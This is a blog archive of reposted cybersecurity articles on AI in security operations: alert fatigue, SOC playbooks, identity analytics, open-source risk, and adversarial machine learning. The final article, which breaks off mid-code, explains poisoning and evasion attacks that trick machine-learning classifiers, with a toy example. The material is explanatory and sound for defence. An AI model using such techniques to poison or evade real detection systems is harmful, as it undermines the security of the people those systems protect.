Category Archives: artificial intelligence

Survey: 44% of Security Professionals Spend More than 20 Hours a Week Responding to Alerts

As the global cybersecurity climate continues to heat up, so too does the alert fatigue IT security professionals have to deal with.

A recent survey by Imperva reveals that nine percent of UK security teams battle with over five million alerts each week. Five million, just let that sink in for a minute.

The survey polled 185 security professionals at Infosecurity Europe, revealing that nine percent have to deal with over a million security alerts each day and leaving 22% feeling “stressed and frustrated.”

Fighting false positives

Our survey revealed that 63% of organizations often struggle to pinpoint which security incidents are critical, while 66% admitted they have ignored an alert due to a previous false-positive result.

Today’s security teams are on the receiving end of an avalanche of alerts, and while many of these alerts represent false positives, a large number also alert teams to critical events which, if ignored, could put an organization at serious risk. With IT security teams already spread thin, these alerts pile on additional pressure, which can become overwhelming.

Alert fatigue

The study also asked how many hours respondents spend every day dealing with security incidents: only 25% spend less than an hour, 31% spend between one and four hours, and 44% of security professionals admitted to spending over four hours every day dealing with security incidents.

Additionally, when respondents were asked what happens when the Security Operations Centre (SOC) has too many alerts for analysts to process, a worrying nine percent said they turn off alert notifications altogether. 23% of respondents said they ignore certain categories of alerts, 58% said they tune their policies to reduce alert volumes, and a lucky 10% said they hire more SOC engineers.

Not all businesses have the luxury to hire more staff when alert volume becomes too high, so Imperva has developed a solution which can help address this burden. Attack Analytics uses the power of artificial intelligence to automatically group, consolidate and analyze thousands of web application firewall (WAF) security alerts across different environments to identify the most critical security events. The solution combats security alert fatigue and allows security teams to easily identify the attacks that pose the highest risk.
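Imperva has not published the internals of Attack Analytics, so the sketch below is only a hypothetical illustration of the core idea: collapsing thousands of raw WAF alerts into a few ranked incident groups. The alert fields and severity scale are assumptions.

```python
from collections import defaultdict

def group_alerts(alerts):
    """Group raw WAF alerts by (attack_type, target) so thousands of
    individual events collapse into a handful of incident groups,
    then rank the groups by peak severity and volume."""
    groups = defaultdict(list)
    for alert in alerts:
        groups[(alert["attack_type"], alert["target"])].append(alert)
    return sorted(
        groups.items(),
        key=lambda kv: (max(a["severity"] for a in kv[1]), len(kv[1])),
        reverse=True,
    )

alerts = [
    {"attack_type": "sqli", "target": "/login", "severity": 9},
    {"attack_type": "sqli", "target": "/login", "severity": 7},
    {"attack_type": "xss", "target": "/search", "severity": 4},
]
ranked = group_alerts(alerts)
print(ranked[0][0])  # ('sqli', '/login') -- the highest-risk group
```

Three raw alerts become two incidents, with the highest-severity, highest-volume group surfaced first, which is the essence of combating alert fatigue by consolidation.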

Top strategic predictions for IT organizations and users in 2019 and beyond

Gartner revealed its top predictions for 2019 and beyond. Gartner’s top predictions examine three fundamental effects of continued digital innovation: artificial intelligence (AI) and skills, cultural advancement, and processes becoming products that result from increased digital capabilities and the emergence of continuous conceptual change in technology. “As the advance of technology concepts continues to outpace the ability of enterprises to keep up, organizations now face the possibility that so much change will increasingly seem chaotic. … More

The post Top strategic predictions for IT organizations and users in 2019 and beyond appeared first on Help Net Security.

Cybersecurity Future Trends: Why More Bots Means More Jobs

As the technological world hurtles into the 2020s and cybersecurity future trends become reality, many experts expect the industry to evolve rapidly. Among the paradigm shifts still to come from digital innovation, data protection is bound to change and expand beyond the capabilities of today’s most common tools.

Above all, expect artificial intelligence (AI) to take a bigger role in cybersecurity as the IT industry seeks more efficient ways to shut down attacks immediately — or even before they happen.

Hiring AI Cybersecurity Guards

In the near future, new AI-powered solutions will look for anomalies in enterprise systems while matching patterns in threat actor behavior to predict when attacks are coming, said Shashi Kiran, chief marketing officer at Quali, a vendor of cloud automation services. Companies will also use AI tools to analyze user behavior and dig through system logs to spot problems, noted Laura Lee, executive vice president of rapid prototyping at cybersecurity training vendor Circadence. Lee said she expects AI-powered cybersecurity training to become more common as well.

In addition, AI systems will soon be able to analyze data from multiple sources, provide virtual assistants with special knowledge in cybersecurity and assist with penetration testing. In the coming decades, the “full scope of AI will be brought to bear in cybersecurity training environments to provide intelligent advisers, feedback and an AI adversary to practice against,” Lee added.
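Kiran’s “matching patterns in threat actor behavior” can be illustrated at toy scale: checking whether a known attack sequence appears, in order, in a stream of log events. This is a sketch under assumed event names, not any vendor’s detection logic.

```python
def matches_pattern(events, pattern):
    """True if `pattern` occurs as an ordered subsequence of the event
    stream (steps need not be adjacent) -- a toy TTP-sequence matcher."""
    it = iter(events)
    # `step in it` consumes the iterator up to the first match, so each
    # pattern step must appear somewhere after the previous one.
    return all(step in it for step in pattern)

events = ["login_fail", "login_fail", "login_ok",
          "priv_esc", "lateral_move", "exfil"]
print(matches_pattern(events, ["login_ok", "priv_esc", "exfil"]))  # True
print(matches_pattern(events, ["exfil", "login_ok"]))              # False
```

Real systems score fuzzier matches over noisy telemetry, but the ordered-subsequence check captures the basic shape of behavioral pattern matching.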

Planning for Obsolescence

Newer AI systems should provide capabilities that traditional antivirus products can’t. Many current security products focus largely on signature-based detection or analytics from patterns of suspicious activity, said Jason Rebholz, senior director of strategic partnerships at cybersecurity vendor Gigamon.

“With the emergence of AI, the basic decision-making can be offloaded to software,” he added. “While this isn’t a replacement for the analyst, it provides more time for them to perform more advanced decision-making and analysis, which is not easily replaced with AI.”

An AI-Driven Coding Evolution

Some security experts see big things for AI, with a sort of evolution built into its abilities.

“Imagine a world where cyberdefenses adapt and evolve with no human intervention,” said Kathie Miley, chief operating officer (COO) at Cybrary, another cybersecurity training company. “By putting AI into practice with evolutionary algorithms, software will also be able to assess current state, improve upon itself or kill off components no longer ideal for survival.”

Miley offered the example of a developer who accidentally creates a program with a structured query language (SQL) injection vulnerability: “AI will catch it and correct it with no human involvement, because it knows [the vulnerability is] dangerous to the application’s survival.”
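Long before AI can rewrite code autonomously, far simpler tooling can catch the pattern Miley describes. A minimal, purely hypothetical static check might flag SQL statements built by string interpolation rather than parameterized placeholders:

```python
import re

# Crude heuristic: flag execute() calls that build SQL with f-strings,
# string concatenation/formatting, or .format(), instead of parameters.
RISKY = re.compile(r"""execute\(\s*(f["']|["'][^"']*["']\s*(%|\+)|.*\.format\()""")

def find_sqli_risks(source):
    """Return 1-based line numbers of suspicious query construction."""
    return [i + 1 for i, line in enumerate(source.splitlines())
            if RISKY.search(line)]

code = '''
cur.execute(f"SELECT * FROM users WHERE name = '{name}'")
cur.execute("SELECT * FROM users WHERE id = %s", (uid,))
'''
print(find_sqli_risks(code))  # [2] -- only the interpolated query is flagged
```

A regex is obviously no substitute for the self-healing AI Miley envisions; it merely shows that the vulnerable pattern is mechanically recognizable.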

Unfortunately, AI-trained systems won’t be exclusive to defenders. As Miley noted, threat actors “will be able to use AI to evolve their attacks without lifting a finger. It’s a race to who is stronger — the good guys or the bad guys.”

Why Cybersecurity Future Trends Won’t Exclude Humans

But even as AI takes a more central role in many organizations’ cybersecurity efforts, the need for qualified cybersecurity professionals will not diminish.

“Until AI evolves and wipes out humans, there will always be a place for people in the cybersecurity field,” Miley said. “Regulations, compliance, ethics and needs will need to be determined by us carbon life forms. However, tasks such as monitoring attacks and coding errors — and even coding itself — will certainly be automated at some point in the near future.”

Miley added that she sees a strong demand for security architects and governance, risk and compliance professionals in the coming years.

How AI Will Help Bridge the Skills Gap

New ways of automating some cybersecurity functions will help the industry bridge the cybersecurity skills gap that’s been growing since 2014. A recent Cybersecurity Ventures report forecast 3.5 million unfilled cybersecurity positions by 2021.

Bret Fund, founder and CEO of cybersecurity training academy SecureSet, argued that automated tools will require more refined skill sets.

“We will still have an education problem that will be exacerbated by the new skills required to interpret and analyze AI,” he predicted.

In addition, many small and medium-sized businesses will adopt AI tools more slowly than large enterprises will, meaning plenty of cybersecurity jobs will be available, Fund added.

Cybersecurity Workers: Seize the Day

Lee noted that demand is growing for cybersecurity workers with data science expertise as organizations look to maximize the value of the data they collect. She said she also foresees a shift in cybersecurity jobs that will “place soft skills and strategy at equal importance as required technical skills.”

Cybersecurity analysts, penetration testers and incident response professionals will be popular with job recruiters for several years, she added. However, those jobs may be changing, with more workers “expected to carry competencies in strategic thinking, creativity, problem-solving, working in teams and reporting alongside business objectives.”

Augmenting Automation With a Human Touch

According to Cesar Cerrudo, chief technology officer (CTO) of cybersecurity and penetration testing vendor IOActive Labs, paint-by-the-numbers cybersecurity jobs will soon be a thing of the past.

“Jobs that consist of repetitive tasks and tasks that don’t require creativity will disappear,” he said. “Having broad knowledge of past, latest and upcoming threats, along with broad vision in cybersecurity, will be required to achieve better results. You can’t properly secure a technology without anticipating what it will look like tomorrow or in the next year.”

As technologies and their security measures carry us into 2020, forecasting threat trends will be the name of the game. Machine learning won’t replace the cybersecurity workforce any time soon, but get ready for a new face (or lack thereof) on your security operations center (SOC). Developing a broader skill set now and keeping an open mind will help you best prepare for the security industry of the future.

The post Cybersecurity Future Trends: Why More Bots Means More Jobs appeared first on Security Intelligence.

How to Avoid the Trap of Fragmented Security Analytics

The continuous evolution of attack tactics and poor threat visibility keeps cyber defenders on their toes, especially when adversaries exploit the human mind with tactics such as phishing and using individually crafted, short-lived weaponizations. As a result, more and more security organizations are prioritizing the use of security analytics to quickly and accurately identify attacks and act before major damage is done.

Why a Fragmented Approach Doesn’t Work

This movement into security analytics is not without its hitches, especially when organizations acquire a fragmented set of analytics tools. At first glance, it seems logical to have separate analytics for networks, endpoints, users, cloud and applications. Highly specialized tools can produce some promising new insights in a small amount of time.

However, when each of these tools is producing high-volume data and individual alerts, analysts must constantly switch between different screens. The result is often a substantial increase in operational cost and time to investigate, scope and decide on remediation steps.

Part of this problem can be tactically reduced by using automation and orchestration, but the real problem arises when the organization looks to increase the quality and depth of detection by using behavioral analytics or machine learning, which require a broad mix of data and substantial training time. While fragmented tools may be good at producing individual alerts, the underlying data often remains proprietary to each tool, preventing organizations from moving to advanced machine learning-based detection. A third problem is the overhead of data management and administration across all these individual tools.

Embrace a Platform-Based Approach to Security Analytics

To avoid this trap, security teams should consider a platform-based approach whereby data ingestion, correlation, management and a broad set of analytics can be tied together. Solid correlation within the entire data stream offers great perspective for moving into more mature detection.

For instance, let’s say an organization wants to increase visibility into service accounts — i.e., accounts used by administrators to configure an application or tool — which are often targeted by adversaries to steal the business’ crown jewels. Not only is the service account login information required, but also other information to identify the real original user, such as where they accessed the account from, what time they accessed it, what other tools they were using and other actions they executed.

This combination requires a lot of correlations, both at the data intake level — adding system name and user name to network data — and downstream at the detection process, such as connecting and measuring individual anomaly events into a risk metric (i.e., combining abnormal process started with abnormal network traffic and user activity outside peer group activity). This level of advanced correlation is almost impossible using fragmented tools because it requires a common reference set of all users, assets, networks and system names — which, in today’s enterprise environment, doesn’t exist or is below satisfaction.
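The downstream step, connecting individual anomaly events into a single risk metric per entity, can be sketched as a weighted sum. The signal names and weights below are assumptions for illustration, not a standard scoring scheme:

```python
def risk_score(anomalies, weights=None):
    """Combine individual anomaly events observed for one entity into a
    single risk metric: any one anomaly is weak evidence, but several
    together push the entity over an alerting threshold."""
    weights = weights or {
        "abnormal_process": 30,
        "abnormal_network_traffic": 25,
        "activity_outside_peer_group": 20,
        "off_hours_login": 15,
    }
    # Unrecognized signals still contribute a small default weight.
    return sum(weights.get(a, 10) for a in anomalies)

score = risk_score(["abnormal_process",
                    "abnormal_network_traffic",
                    "activity_outside_peer_group"])
print(score, score >= 60)  # 75 True -> raise an incident
```

The point of the example is the correlation requirement in the text: the three signals can only be summed per entity if process, network and user data share common user and asset identifiers.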

Security analytics offers many benefits to detect, investigate and respond to threats. However, to move toward deep, advanced analytics using artificial intelligence (AI) and machine learning, fragmented tools should be replaced with a platform-based approach that can leverage a broad set of data.

Watch the webinar to learn more

The post How to Avoid the Trap of Fragmented Security Analytics appeared first on Security Intelligence.

Does Your SOC Have a Security Playbook?

As the top coaches of any professional sports team would confirm, the best playbook is about much more than just the plays. In the same way that coaches use whiteboards and adhesive notes to draw diagrams in their playbooks, many security operations centers (SOCs) have printed binders of actions to take when data breaches occur. Some analysts print out events and tape them to walls to put a series of events in order.

According to Steve Moore, chief security strategist at Exabeam, a security playbook is designed to help analysts answer the following fundamental questions: How big is the problem, and who was involved?

“The core of answering the question is understanding the state of every IP address, every host and every account used 24 hours a day,” he explained. “This is the real hidden framework that enables a valuable response playbook.”

Short of having these full analysis timelines, a complete response isn’t possible. But with the right help, careful planning, and regularly rehearsed and tested processes, SOC analysts can respond to incidents with confidence and consistently keep their enterprise networks safe from compromise.

Why Your SOC Needs a Security Playbook

Players on the field understand that the game is a constant cycle of defending, attacking and transitioning. No one knows what threatens the enterprise more than the frontline defenders, which is why playbooks are built by analysts. An SOC with a playbook has the advantage of being able to focus only on the alerts that matter.

“By utilizing a playbook, it is guaranteed that the analysts will make the determination regarding the initial validity of the alert in front of them as quickly as possible, allowing the SOC to handle a lot more incoming alerts and focus on actual incidents or threats to the organization,” said Meny Har, vice president of product at Siemplify.

Without playbooks, analysts tend to revert to their gut — which might be effective for the individual, but it leaves the entire team at the mercy of the knowledge that exists within that analyst’s mind. SOCs that suffer from high turnover rates risk not only the loss of analysts, but also the loss of their undocumented expertise. In addition, Moore said that without a playbook, “your work product will vary in effort and quality, and new associates will take longer to acclimate without a playbook.”

New hires within an SOC could take nine months to get up to speed, but using the right technology and process can potentially reduce the learning curve.

Be Flexible and Adaptive

It is a given that the offense will change its tactics unexpectedly, so the playbook should be flexible enough to support a constantly improving process. Making built-in adaptability a guiding concept will remind the team that agility has great value when it comes to security.

“By utilizing clear, auditable playbooks, SOCs can gain very meaningful insights into their own process, creating effective feedback loops as well as measurements and metrics,” Har explained. “This allows the SOC to identify bottlenecks where configuration changes (or automation) can take place and where the analysts can make even better decisions.”

The SOC team also relies on the contextual data included in the playbooks to determine whether to escalate or collaborate with further resources. While adaptability is important, playbooks should include the types of threats that have been seen in previous occurrences. They should detail whether an alert was deemed a false positive, who worked on the threat, what was previously done and what actions proved effective. Including all this information in the playbook puts analysts in a better position to make the best possible decisions so they can quickly respond to security incidents.

Balance Automation and Human Decision-Making

For more advanced SOCs, the playbook will strike a balance between leveraging automation and providing analysts with the knowledge they need to make their own decisions when necessary. Automating intelligence helps the SOC team identify not only whether an alert is malicious, but also how it is malicious, which provides some guidance on the best way to remove or handle the threat. In addition, automating contextual data helps identify whether a specific alert pertains to a high-value part of the network or a marginal one.

Let’s say an endpoint is infected and a set of credentials is stolen — what has to happen? The first step is to reference a timeline to determine whether the account was signed in to a second system that it’s never accessed before.
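That first timeline lookup, whether the account has ever touched a given system before, reduces to a set-membership check over historical access records. A minimal sketch with assumed log fields:

```python
def is_first_access(access_log, account, host):
    """Return True if `account` has never signed in to `host` before,
    judging from the historical access log."""
    seen = {(e["account"], e["host"]) for e in access_log}
    return (account, host) not in seen

log = [
    {"account": "svc-backup", "host": "db01"},
    {"account": "svc-backup", "host": "db02"},
]
print(is_first_access(log, "svc-backup", "hr-fileserver"))  # True: new host
print(is_first_access(log, "svc-backup", "db01"))           # False: routine
```

A first-time sign-in to an unfamiliar system is exactly the kind of discrete event that escalates the stolen-credential scenario from noise to incident.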

“The analyst could further submit that malware for automated analysis,” Moore said. “The action could involve blocking associated IP addresses, disabling the account, taking the machine offline, and sending an email to the associate’s manager and the privacy office.

“Think of automation, in its simplest terms, as a virtual helper for often-repeated and time-consuming tasks,” Moore continued. “The best type of security automation is one that vacuums up all the little unrelated events that occur inside your network and orders them into a timeline, ties them to a human or device, makes it quickly referenceable by risk, and illustrates which discrete events are normal or abnormal.”
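Moore’s description, vacuuming up unrelated events and ordering them into per-entity timelines, amounts to a group-and-sort. The field names in this sketch are assumptions:

```python
from collections import defaultdict

def build_timelines(events):
    """Tie each raw event to the human or device it belongs to, then
    order each entity's events by timestamp: a minimal timeline."""
    timelines = defaultdict(list)
    for e in events:
        timelines[e["entity"]].append(e)
    for entity_events in timelines.values():
        entity_events.sort(key=lambda e: e["ts"])
    return dict(timelines)

events = [
    {"entity": "alice", "ts": 105, "action": "usb_mount"},
    {"entity": "host-7", "ts": 101, "action": "new_process"},
    {"entity": "alice", "ts": 100, "action": "login"},
]
timelines = build_timelines(events)
print([e["action"] for e in timelines["alice"]])  # ['login', 'usb_mount']
```

Once events are pinned to an entity and ordered in time, the risk-ranking and normal-versus-abnormal judgments Moore describes have something concrete to operate on.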

Balancing automation with playbooks allows analysts to quickly understand additional risks so they can take immediate action to remove an adversary from a network or endpoint.

Measure and Improve Your Process

In writing playbooks, security leaders outline the right processes and procedures for SOC analysts to deal with the alerts they have actually seen. They should also describe the processes the SOC will need to carry out to optimally handle any alerts and threats they may someday face. The team should constantly evaluate whether there was a situation it encountered for which the playbook didn’t account.

“This typically takes the form of ‘improvement’ steps within individual workflows — a place where analysts can note and update their individual experiences,” Har explained.

If it so happens that an incident is inappropriately escalated, the process managers of the SOC can then go into an iterative process to evaluate what might have been a more valuable use of time for future reference. The playbook authors should take a higher-level view of the threat landscape of the organization while also looking at any new intelligence that may need special handling. For this reason, playbooks may not all be rolled out at the same time.

“This is where new playbooks are introduced to alerts which previously had none defined,” Har said. “This is also where high-level KPIs and metrics the SOC has collected are used as feedback. Where are my analysts spending the most time? Can certain steps be removed, adapted or alternatively automated?”

The idea is also to increase the efficiency and time allocation of SOC resources over time, usually at a cadence determined by a higher-level employee in the SOC, be it the manager, director or sometimes even more senior personnel.

Read the Offense

Playbooks are designed to help SOC teams respond to known threats because security breaches are not typically the result of unknown threats. Security breaches most often occur because of unpatched vulnerabilities or other lax security practices, such as failure to perform risk analysis or basic network segmentation, misconfiguration, lack of security tools, and failure to make time for analysts to actually review detected threats.

“For a security team, an unknown threat is not necessarily a new threat or vulnerability that has never been seen before, but any threat that has not been detected by the organization’s own sensors and teams,” Har said.

That said, playbooks can quickly and effectively eliminate any background noise. When relevant threats are identified, they need to be addressed quickly through collaboration between relevant parties and rapid execution of the incident response plan.

Although no playbook is perfect, threat actors are far less likely to bypass a defense with well-defined and tested strategies. For the SOC team, strong defense comes from the ability to properly allocate precious resources, one of which is time.

When senior analysts are able to spend time looking beyond a reactive approach to threat response, they can shift to more proactive threat detection. From the threat hunting process, they can even develop additional threat intelligence-based playbooks to better position the team against unknown threats that the SOC would likely not have known about.

Discover Resilient dynamic playbooks

The post Does Your SOC Have a Security Playbook? appeared first on Security Intelligence.

New tools from IBM and Google reveal it’s hard to build trust in AI

The unseen dangers inherent in artificial intelligence (AI) are proving the importance of IBM and Google’s diverse approach to this multifaceted problem. Brad Shimmin and Luciano C. Oviedo offer their perspective on this important issue. Brad Shimmin, Service Director at GlobalData Artificial Intelligence (AI) has already changed the way consumers interact with technology and the way businesses think about big challenges like digital transformation. In fact, GlobalData research shows that approximately 50% of IT buyers … More

The post New tools from IBM and Google reveal it’s hard to build trust in AI appeared first on Help Net Security.

Cybersecurity Research Shows Risks Continue to Rise

Research is at the center of the cybersecurity industry, with a steady stream of reports that highlight weaknesses in cyber defenses and potential solutions. Last week was a particularly busy

The post Cybersecurity Research Shows Risks Continue to Rise appeared first on The Cyber Security Place.

Maximize the Power of Your Open Source Application Security Testing

Open source components are the building blocks of the application economy. According to recent research, open source components make up 60 to 80 percent of the code base in modern applications.

Developers depend on components that are written and maintained by the open source community to work faster and more efficiently, and to keep up with rapid demand for new versions and updates.

What’s Driving the Rise of Open Source?

According to a WhiteSource survey titled “The State of Open Source Vulnerabilities Management,” 96.8 percent of developers reported that they use open source components “all the time,” “very often” or “sometimes.” Only 3.2 percent of developers reported that they did not use open source at all, likely due to policies that do not allow them to do so in their organizations. Interestingly enough, developers who use open source components rely on them significantly, which can explain why none of the respondents described their usage as “rarely.”

Frequency of Open Source Use

However, despite the technology industry’s dependence on these components, there is an unfortunate lack of understanding regarding how to properly manage risk when utilizing them. To get a real handle on how to uphold best practices when it comes to using open source components securely, organizations must first realize how much of this code they are using.

Why It’s Important to Track Your Open Source Components

Open source components carry their own risks: threat actors can exploit vulnerabilities in popular open source projects to target thousands of organizations at once, many of which are unaware they are even using the vulnerable components in their products.

Tracking inventories and managing security — especially if there is no practice in place for directing how open source components should be handled — is no small feat. Companies looking to harness the power of open source components in their products have a responsibility to use them securely.

In far too many organizations, developers don’t effectively track which open source components they are using in their code. In other cases, they are expected to make manual records in spreadsheets or notify colleagues via email about the components they use. Neither option is truly viable at scale, nor do they satisfy the security need to identify components with known vulnerabilities.
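Even a rudimentary automated inventory beats spreadsheets and email. As a sketch, assuming a hypothetical advisory feed of known-vulnerable (name, version) pairs, an audit becomes a simple lookup over the declared manifest:

```python
# Hypothetical advisory feed, keyed by (component, version). In practice
# this would be populated from the NVD or similar sources.
KNOWN_VULNERABLE = {
    ("example-lib", "1.2.0"),
    ("other-lib", "0.9.1"),
}

def audit_components(manifest):
    """Compare a declared component inventory against known-vulnerable
    (name, version) pairs -- you can't patch what you don't know."""
    return [(name, ver) for name, ver in manifest
            if (name, ver) in KNOWN_VULNERABLE]

manifest = [("example-lib", "1.2.0"), ("safe-lib", "2.0.0")]
print(audit_components(manifest))  # [('example-lib', '1.2.0')]
```

The hard parts in real life are keeping the manifest complete (including transitive dependencies) and keeping the advisory feed current, which is exactly why manual tracking fails at scale.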

What Are the Potential Risks of Using Open Source Components?

As opposed to proprietary code that is written in-house — where the main concern is that an attacker might uncover a previously unknown vulnerability — open source faces different risks.

When a vulnerability is discovered by a security researcher in the open source community, it is reported to one of the many databases and security advisory organizations, such as the National Vulnerability Database (NVD). Vulnerability disclosures help inform organizations that they could be using flawed components.

Potential attackers monitor these databases and use them to target organizations that are deploying vulnerable components, hoping to prey on victims that are too slow to remediate the flaws right away. Therefore, the challenge for organizations is to stay on top of which open source components they are using and know which ones are vulnerable to exploitation. To put it simply, you can’t patch what you don’t know.

Another challenge is that it’s virtually impossible to manage a continuous inventory of open source components used in your products and match them to newly discovered vulnerabilities through manual tracking. It is certainly not scalable for any organization that has teams of developers, which is commonplace today.

It’s also extremely difficult to collect all the open source vulnerability information that originates from the NVD and other resources. We’ll review this topic in a future post.

Take Control of Open Source Application Security Testing

Getting a handle on the vulnerability status of your open source components is the first step toward improving the security of your applications. When managed correctly, open source code is a valuable asset in the hands of developers.

However, with great power comes great responsibility. For leadership, this means making sure your team has the tools it needs to effortlessly maintain a proper inventory of open source components — and using this information to create actionable steps to keep your products secure.

Discover IBM Application Security on Cloud

The post Maximize the Power of Your Open Source Application Security Testing appeared first on Security Intelligence.

Cyber security in the energy sector: Rolling out a strategy in the face of disruption – Part 3

This is the final article in a three part series looking at cyber security in the energy sector. Here, Information Age looks at how energy companies can best roll out

The post Cyber security in the energy sector: Rolling out a strategy in the face of disruption – Part 3 appeared first on The Cyber Security Place.

How Analytics Can Help You Better Understand Access Risks

Cloud, the Internet of Things (IoT), mobile and digital business initiatives have broadened the surface and increased the complexity of identity and access management (IAM) environments. With millions of entitlements to manage across thousands of users and hundreds of applications, organizations are struggling to keep their access risks in check.

Today’s environments have become so complex that no reasonable IAM professional — no matter how talented — could feasibly gather, analyze and detect every relevant access-related risk factor. This lack of insight is leading to security risks, operational inefficiencies, loss of data and failure to comply with regulatory standards.

A modern approach to identity demands not only strong access controls and governance, but also a high level of risk awareness. Old-school, rules-based approaches to policy management for access controls, identity management and data governance can’t effectively pinpoint the new types of suspicious and harmful activities that are occurring in large and complex environments. Instead, organizations must consider an analytics-based approach that simplifies the demands placed on IAM professionals.

The Identity Analytics Imperative

A typical IAM system contains basic information about who users are and what they can access. However, this data isn’t sufficient to provide an accurate picture of access-related risks. To get a holistic view of access risks, you must obtain information about what users are really doing with their access privileges.

This means incorporating data from a vast array of other sources, such as data access governance, content-aware data loss prevention, security information and event management (SIEM), and database monitoring systems, as well as application, web, network, database and endpoint logs. By gathering data from various sources, advanced analytics techniques can create a holistic view of the managed environment and provide a 360-degree view of access risks. This is known as identity analytics, a process that employs big data, machine learning and artificial intelligence (AI) technologies to consume and analyze vast amounts of data and distill that data into actionable intelligence, allowing organizations to detect and respond to access risk more quickly.

Using Baselines to Understand the Abnormal

Identity analytics enables administrators to be proactive rather than reactive through continuous monitoring of the identity environment. It builds behavioral baselines of normal user activity and then detects anomalies against those baselines.

Typical user activities, such as requesting access to applications, logging into applications and accessing data in file sharing systems, are normal in isolation but would raise a flag when done at an unusually high volume or frequency. With an understanding of baseline and abnormal behavior, organizations can achieve better compliance with meaningful and actionable insights about user activity at each stage of the user access life cycle.
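The baseline idea can be sketched as a per-user deviation score: how far today's activity count sits from that user's own history, measured in standard deviations. A real system would use far richer features, but the shape is the same; the sample numbers are assumptions:

```python
import statistics

def deviation_from_baseline(history, observed):
    """How many standard deviations an observed activity count sits
    from the user's own historical baseline."""
    mean = statistics.mean(history)
    stdev = statistics.pstdev(history) or 1.0  # avoid divide-by-zero
    return abs(observed - mean) / stdev

daily_file_accesses = [14, 11, 13, 12, 15]   # a normal week for this user
print(deviation_from_baseline(daily_file_accesses, 13))   # ~0: normal
print(deviation_from_baseline(daily_file_accesses, 400))  # large: flag it
```

Accessing files is normal in isolation; only the comparison against the user's own baseline reveals that 400 accesses in a day is worth a flag.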

The diagram below illustrates the stages users go through when joining a business workforce and obtaining access to the tools and assets necessary to do their job. The IAM life cycle also includes stages to ensure that employees maintain appropriate access as they move within the organization, with access being revoked or changed when they separate or change roles.

In each phase, identity analytics data increases risk awareness and responsiveness, provides richer contextual user experiences and informs behavioral-based access policies. It bridges the gap between administrative controls and runtime activities, enabling administrators to get a clearer picture of how users are actually utilizing their access. With identity analytics, IAM teams can detect suspicious user activity, remediate inappropriate access and adjust access policies as necessary.

The lifecycle of user access, from request to recertification

Identity analytics leverages machine learning and application usage data to make access policy and role recommendations that are based on user behavior and data usage — not merely on assigned entitlements or entitlement histories. These recommendations can provide IAM teams with a more accurate snapshot of policy and minimize the proliferation of unnecessary entitlements.

The Added Value of Artificial Intelligence

AI technology can make identity analytics an even more robust tool. With AI, identity analytics can automatically predict trends and behaviors, identify what may potentially happen and make recommendations for corrective action. It is a self-learning system that uses data mining and machine learning techniques to generate not just answers, but hypotheses, evidence-based reasoning and recommendations for improved decision-making in real time.

Cognitive systems use analysis methods such as machine learning, clustering, graph mining and entity relationship modeling to identify potential threats. For example, cognitive identity analytics systems can learn personality traits from users’ messages, blogs, emails and social data, and then use those traits to predict whether certain users could be potential insider threats. This analysis, combined with users’ activity and access patterns, can help raise the alarm for system admins and then suggest possible actions they could take to address the concern.

Identity analytics makes IAM smarter by enhancing existing processes with a rich set of user activity and event data, peer group analysis, anomaly detection, and real-time monitoring and alerting. The net result is improved compliance and reduced risk.

Using identity analytics can help your organization embrace the future of IAM — a future that’s smarter, more effective and more secure.

Read the Forrester report

Are you interested in expanding your identity and access management (IAM) solutions to include identity analytics? Cloud Identity Analyze is IBM’s newest addition to the Cloud Identity family. Cloud Identity provides cloud-based IAM capabilities from federated single sign-on (SSO) to multifactor authentication (MFA), identity provisioning, governance and more.

Cloud Identity Analyze is currently in beta and open to existing Identity Governance and Intelligence (IGI) and IBM Security Identity Manager (ISIM) customers to trial.

The post How Analytics Can Help You Better Understand Access Risks appeared first on Security Intelligence.

How Can Companies Defend Against Adversarial Machine Learning Attacks in the Age of AI?

The use of AI and machine learning in cybersecurity is on the rise. These technologies can deliver advanced insights that security teams can use to identify threats accurately and in a timely fashion. But these very same systems can sometimes be manipulated by rogue actors using adversarial machine learning to provide inaccurate results, eroding their ability to protect your information assets.

While it’s true that AI can strengthen your security posture, machine learning algorithms are not without blind spots that could be attacked. Just as you would scan your assets for vulnerabilities and apply patches to fix them, you need to constantly monitor your machine learning algorithms and the data that gets fed into them for issues. Otherwise, adversarial data could be used to trick your machine learning tools into allowing malicious actors into your systems.

Most research in the adversarial domain has been focused on image recognition; researchers have been able to create images that fool AI programs but that are recognizable to humans. In the world of cybersecurity, cybercriminals can apply similar principles to malware, network attacks, spam and phishing emails, and other threats.

How Does Adversarial Machine Learning Work?

When building a machine learning algorithm, the aim is to create a model that classifies every input correctly, but the model can only generalize from the information in its training sample set to all other samples. This makes the model imperfect and leaves it with blind spots for an adversary to exploit.

Adversarial machine learning is a technique that takes advantage of these blind spots. The attacker provides samples to a trained learning model that cause the model to misidentify the input as belonging to a different class than what it truly belongs to.

What Does the Adversary Know?

The sophistication of an attack and the effort required from the adversaries depends on how much information attackers have about your machine learning system. In a whitebox model, they have information about inputs, outputs and classification algorithms. In a graybox model, the attackers only know the scores that your model produces against inputs. A blackbox model is the hardest to exploit because the attackers only know classifications such as zero/one or malicious/benign.

Figure 1

Types of Adversarial Machine Learning Attacks

There are two primary types of adversarial machine learning attacks: poisoning attacks and evasion attacks. Let’s take a closer look at the similarities and differences between the two.

Poisoning Attacks

This type of attack is more prevalent in online learning models — models that learn as new data comes in, as opposed to those that learn offline from already collected data. In this type of attack, the attacker provides input samples that shift the decision boundary in his or her favor.

For example, consider the following diagram showing a simple model consisting of two parameters, X and Y, that predict if an input sample is malicious or benign. The first figure shows that the model has learned a clear decision boundary between benign (blue) and malicious (red) samples, as indicated by a solid line separating the red and blue samples. The second figure shows that an adversary input some samples that gradually shifted the boundary, as indicated by the dotted lines. This results in the classification of some malicious samples as benign.

Figure 2
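The boundary-shifting effect can be sketched with a toy online learner; this hypothetical nearest-centroid classifier stands in for a real model, and the coordinates are illustrative. Attacker-supplied samples labeled "benign" drag the benign centroid toward the malicious region until a malicious sample falls on the wrong side of the boundary:

```python
class OnlineCentroidClassifier:
    """Toy online learner: keeps a running centroid per class and
    labels a sample by its nearest centroid."""
    def __init__(self):
        self.sums = {"benign": [0.0, 0.0], "malicious": [0.0, 0.0]}
        self.counts = {"benign": 0, "malicious": 0}

    def learn(self, point, label):
        self.sums[label][0] += point[0]
        self.sums[label][1] += point[1]
        self.counts[label] += 1

    def centroid(self, label):
        n = self.counts[label]
        return (self.sums[label][0] / n, self.sums[label][1] / n)

    def classify(self, point):
        def dist2(c):
            return (point[0] - c[0]) ** 2 + (point[1] - c[1]) ** 2
        return min(("benign", "malicious"),
                   key=lambda lbl: dist2(self.centroid(lbl)))

model = OnlineCentroidClassifier()
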